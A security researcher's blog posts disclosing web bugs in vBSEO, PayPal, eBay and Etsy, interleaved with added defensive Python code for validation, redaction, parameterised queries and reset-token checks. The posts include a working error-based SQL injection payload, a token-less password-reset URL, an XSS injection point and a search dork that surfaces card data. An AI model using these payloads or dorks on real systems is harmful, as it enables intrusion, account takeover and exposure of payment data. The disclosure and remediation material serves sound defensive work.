Tuesday, December 24, 2013

Cross-Site Scripting (XSS - Stored) vulnerability in vBulletin SEO Plugin vBSEO

Posted by Yogesh Jaygadkar at 11:07 AM

Exploit Title: Cross-Site Scripting (XSS - Stored) vulnerability in vBulletin SEO Plugin vBSEO.
Found By: Yogesh Jaygadkar | http://www.jaygadkar.com/
Tested versions: vBSEO 3.2.0 & vBSEO 3.6.0
Tested with: vBulletin 4.0.6 & vBulletin 4.2.1
Vulnerable POST Parameter: sendtrackbacks

The vBSEO plugin for vBulletin contains a flaw that allows a stored cross-site scripting (XSS) attack. The flaw exists because the application does not validate the 'sendtrackbacks' parameter when it is submitted to the /forum/newreply.php and /forum/newthread.php scripts. An attacker can therefore create a specially crafted request that executes arbitrary script code in a user's browser within the trust relationship between that browser and the server.

POC:

http://www.VictimVBForum.com/forum/newreply.php?do=postreply&t=[Thread ID]
http://www.VictimVBForum.com/forum/newthread.php?do=newthread&f=

On the Advanced Reply or New Thread page, put your ">vector in the "Trackback" options.

Submit the reply. (You can also test it by clicking the Preview Post button.)

 
Done  ;)
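The fix the post implies is server-side validation of the trackback list plus output encoding when it is re-rendered. This is an added example, not vBSEO or vBulletin code; the function names and the sample submission are constructed for illustration.

```python
# Added example (not vBSEO/vBulletin code): validate and encode a trackback URL
# list the way a fixed newreply.php/newthread.php handler should, so that a
# value submitted in the 'sendtrackbacks' field can never reach the page as markup.
import html
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # trackback targets are absolute http(s) URLs


def validate_trackbacks(raw):
    """Split the submitted field on whitespace and return (accepted, rejected).

    Rejected values are never echoed back to the browser, so a payload such
    as the post's '">vector' is dropped instead of being re-rendered."""
    accepted, rejected = [], []
    for item in raw.split():
        parts = urlsplit(item)
        well_formed = parts.scheme in ALLOWED_SCHEMES and bool(parts.netloc)
        has_markup = any(c in item for c in "<>\"'")
        if well_formed and not has_markup:
            accepted.append(item)
        else:
            rejected.append(item)
    return accepted, rejected


def render_trackback_field(urls):
    """Re-render accepted URLs into the form textarea with HTML escaping, so
    the output stays inert even if validation is loosened later."""
    body = html.escape("\n".join(urls), quote=True)
    return '<textarea name="sendtrackbacks">' + body + "</textarea>"


if __name__ == "__main__":
    # Constructed sample input: one legitimate trackback and the post's vector.
    submitted = 'http://blog.example.test/post/1\n">vector'
    ok, bad = validate_trackbacks(submitted)
    print("accepted:", ok)
    print("rejected:", bad)
    print(render_trackback_field(ok))
```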


PayPal : User Credit Card Information Disclosure

Posted by Yogesh at 10:21 AM


Okay... So, here is another old, duplicate bug from PayPal, which I reported long back.


I found some strange results on api-3t.sandbox.paypal.com. This subdomain is storing all of a PayPal user's credit card information in the URL. Below is the Google dork for finding such "stored" CC details.


Google Dork: site:sandbox.paypal.com inurl:CVV2=


Google returns only about 80 results, but the leak is still harmful because sensitive user information is exposed.
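The defensive counterpart to the dork above is checking your own logs for card data in query strings and redacting it before the logs are stored or indexed. This is an added example, not PayPal code; the parameter names, paths and log lines are constructed, and the Luhn check is a heuristic for spotting card numbers under arbitrary parameter names.

```python
# Added example (not PayPal's code): scan web-server access-log lines for
# payment-card data carried in the query string, as the post describes for
# 'CVV2=', and return a redacted copy of each line plus a list of findings.
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

SENSITIVE_KEYS = {"cvv2", "cvv", "cvc", "cardnumber", "pan", "expdate"}  # never belong in a URL
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def luhn_ok(digits):
    """Heuristic: a 13-19 digit value passing Luhn is treated as a card number."""
    if not digits.isdigit() or not 13 <= len(digits) <= 19:
        return False
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0

def redact_target(target):
    """Return (redacted_target, findings) for one request target."""
    parts = urlsplit(target)
    findings, cleaned = [], []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() in SENSITIVE_KEYS:
            findings.append(key + ": sensitive parameter in URL")
            value = "REDACTED"
        elif luhn_ok(value):
            findings.append(key + ": Luhn-valid card number in URL")
            value = "REDACTED"
        cleaned.append((key, value))
    return urlunsplit(parts._replace(query=urlencode(cleaned))), findings

def scan_log_line(line):
    """Redact the request target inside one access-log line; return (line, findings)."""
    m = REQUEST_RE.search(line)
    if not m:
        return line, []
    new_target, findings = redact_target(m.group("target"))
    return line[:m.start("target")] + new_target + line[m.end("target"):], findings

if __name__ == "__main__":
    # Constructed sample lines; 4111111111111111 is a widely used test card number.
    for entry in (
        '203.0.113.5 - - [24/Dec/2013:10:21:00 +0000] "GET /pay/confirm?card=4111111111111111&CVV2=123&amt=10 HTTP/1.1" 200 512',
        '203.0.113.6 - - [24/Dec/2013:10:21:07 +0000] "GET /pay/status?id=778899 HTTP/1.1" 200 64',
    ):
        print(*scan_log_line(entry), sep="\n  ")
```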





Friday, February 22, 2013

Listed in Barracuda Networks Hall of Fame

Posted by Yogesh at 11:28 PM

Listed in Barracuda Networks Security - Hall of Fame.

I found multiple vulnerabilities in Barracuda security products. The bugs are still not patched; I'll update the POC once all of them get patched.


Thanks :)


Wednesday, February 20, 2013

Listed in Google Hall Of Fame

Posted by Yogesh at 11:35 PM


After 2 consecutive duplicate bugs & 2 rejections, Google accepted my 3 bugs... 1 bug is fixed, 2 more in a row :D. The 1st bug did not qualify for a reward, so they listed me on their Google Hall of Fame - distinction. But soon I'll be on the Reward Recipients page ;)

So, finally I am listed in the Google Hall of Fame. I'll update the POC once all bugs get patched.


Friday, January 25, 2013

SQL Injection Vulnerability in ebay sub domains

Posted by Yogesh at 10:13 AM



Title: SQL Injection Vulnerability in www.ebay.com sub domains
Author: Yogesh D Jaygadkar
Reported: December 27, 2012
Fixed: Jan 15, 2013
Public Released: Jan 25, 2013
Thanks To: Darshit Ashara

Greets: Rahul Bro, Aasim, Sandeep, Sagar

Description:

Last month I reported SQL injection vulnerabilities in www.ebay.com sub domains. You can see how many days they took to patch it and allow me to publish the vulnerability. But finally they fixed it and listed me on their Researchers Acknowledgement page. Like every other bounty hunter, I was also searching for some vulnerability in eBay. At that time I had no idea that eBay doesn't give a bounty for any vulnerability, not even for SQL injection. :)

POC:



Vulnerable Parameter: the checkbox[] array POST parameter.

The search option on the above pages provides "Select Site" checkboxes that filter the search results by country.


HTTP Headers:

Host: sea.ebay.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://sea.ebay.com/searchAnnoucement.php-time=Jan%202012
Cookie: Cookie Value
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

POST Contents: checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+USER())%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&


So this is all for submitting the report. After that I simply used sqlmap, the great :)
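The root cause is that each checkbox[] value was spliced into the SQL text. This added example (not eBay's code) shows that pattern beside the fix: an allow-list of site codes and one bound placeholder per value; the table, site codes and sample rows are constructed.

```python
# Added example (not eBay's code): the 'checkbox[]' site-filter array handled
# two ways. The unsafe builder splices the values into the SQL text, which is
# the pattern the injected value above exploits; the safe one checks each value
# against an allow-list of site codes and binds it with a placeholder. An
# in-memory SQLite table stands in for the announcement search (constructed).
import sqlite3

SITE_CODES = {"us", "uk", "de", "au"}      # assumed allow-list of "Select Site" values
BASE_SQL = "SELECT title FROM announcement"

def build_search_unsafe(sites):
    """Vulnerable: user values become part of the statement text."""
    joined = "','".join(sites)
    return BASE_SQL + " WHERE site IN ('" + joined + "') ORDER BY id"

def build_search(sites):
    """Safe: reject unknown codes, then bind each value with its own '?'."""
    unknown = [s for s in sites if s not in SITE_CODES]
    if unknown:
        raise ValueError("unknown site code(s): " + ", ".join(unknown))
    if not sites:
        return BASE_SQL + " ORDER BY id", ()
    placeholders = ",".join("?" * len(sites))
    return BASE_SQL + " WHERE site IN (" + placeholders + ") ORDER BY id", tuple(sites)

def search(conn, sites):
    """Run the safe query and return matching titles."""
    sql, params = build_search(sites)
    return [row[0] for row in conn.execute(sql, params)]

def demo_db():
    """Constructed sample data for the announcement table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE announcement (id INTEGER PRIMARY KEY, site TEXT, title TEXT)")
    conn.executemany("INSERT INTO announcement (site, title) VALUES (?, ?)",
                     [("us", "US shipping update"), ("uk", "UK fee change"),
                      ("de", "DE holiday hours"), ("au", "AU listing policy")])
    return conn

if __name__ == "__main__":
    conn = demo_db()
    print(search(conn, ["us", "de"]))
    tampered = ["us", "de'"]                    # constructed non-site value
    print(build_search_unsafe(tampered))        # the quote lands verbatim in the SQL
    try:
        search(conn, tampered)
    except ValueError as err:
        print("rejected:", err)
```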



Tuesday, January 8, 2013

Password Reset Vulnerability in etsy.com

Posted by Yogesh at 3:36 AM





Title: Password Reset Vulnerability in etsy.com
Vuln URL: https://www.etsy.com/confirm.php?email=
Author: Yogesh D Jaygadkar
Reported: December 30, 2012
Fixed: December 30, 2012
Public Released: Jan 08, 2013
 

Description:
On etsy.com, when users reset their password, they receive a password reset link like the one below.

https://www.etsy.com/confirm.php?email=[User Email ID]&code=[Token code]&action=reset_password&utm_source=account&utm_medium=trans_email&utm_campaign=forgot_password_1

When I received this mail, I started playing with the link. I noticed that the token was not being validated on the server side, so I removed it and tested with my own ID.



Final POC:
https://www.etsy.com/confirm.php?email=[victim user's email ID]&action=reset_password&utm_source=account&utm_medium=trans_email&utm_campaign=forgot_password_1
And the password changed successfully.

Finally I am listed on the Etsy Thanks page and rewarded with a $1500 bounty and a T-shirt.
Thanks to the Etsy security team for the quick reply.

Thanks to my friends: Darshit, Sandeep, Rahul bro, Aasim, Sagar
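The bug above is a reset endpoint that treated a missing code as acceptable. This added example (not Etsy's code) shows a confirmation check that fails closed on a missing, wrong, expired or reused code and parses a confirm.php-style link of the form shown in the post; the in-memory store, the one-hour lifetime, the example.test host and the addresses are assumptions.

```python
# Added example (not Etsy's code): a reset-confirmation check that fails closed.
# The bug above was that confirm.php honoured a link whose 'code' had simply
# been removed; here a missing, wrong, expired or already-used code is refused,
# and a code only works for the email it was issued to. The in-memory store and
# the one-hour lifetime are assumptions.
import hashlib
import hmac
import secrets
import time
from urllib.parse import parse_qs, urlsplit

RESET_TTL = 3600                 # seconds a code stays valid (assumed)
_pending = {}                    # email -> (sha256(code), expiry_timestamp)

def _digest(code):
    return hashlib.sha256(code.encode()).hexdigest()

def issue_reset_code(email, now=None):
    """Create a one-time code for `email`; only its hash is stored."""
    now = time.time() if now is None else now
    code = secrets.token_urlsafe(32)
    _pending[email.lower()] = (_digest(code), now + RESET_TTL)
    return code                  # sent to the user, never stored in clear

def confirm_reset(email, code, now=None):
    """True only if `code` is the live, unused code issued for `email`."""
    now = time.time() if now is None else now
    if not code:                 # absent or empty token: refuse, never skip the check
        return False
    entry = _pending.get(email.lower())
    if entry is None:
        return False
    stored, expiry = entry
    if now > expiry or not hmac.compare_digest(stored, _digest(code)):
        return False
    del _pending[email.lower()]  # single use: a second submission fails
    return True

def handle_confirm_url(url, now=None):
    """Parse a confirm.php-style link (as in the post) and apply the check."""
    q = parse_qs(urlsplit(url).query)
    if q.get("action") != ["reset_password"]:
        return False
    return confirm_reset(q.get("email", [""])[0], q.get("code", [""])[0], now)

if __name__ == "__main__":
    code = issue_reset_code("victim@example.test")   # constructed address
    base = "https://www.example.test/confirm.php?email=victim@example.test&action=reset_password"
    print("without code:", handle_confirm_url(base))                   # False
    print("with code:   ", handle_confirm_url(base + "&code=" + code))  # True
```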

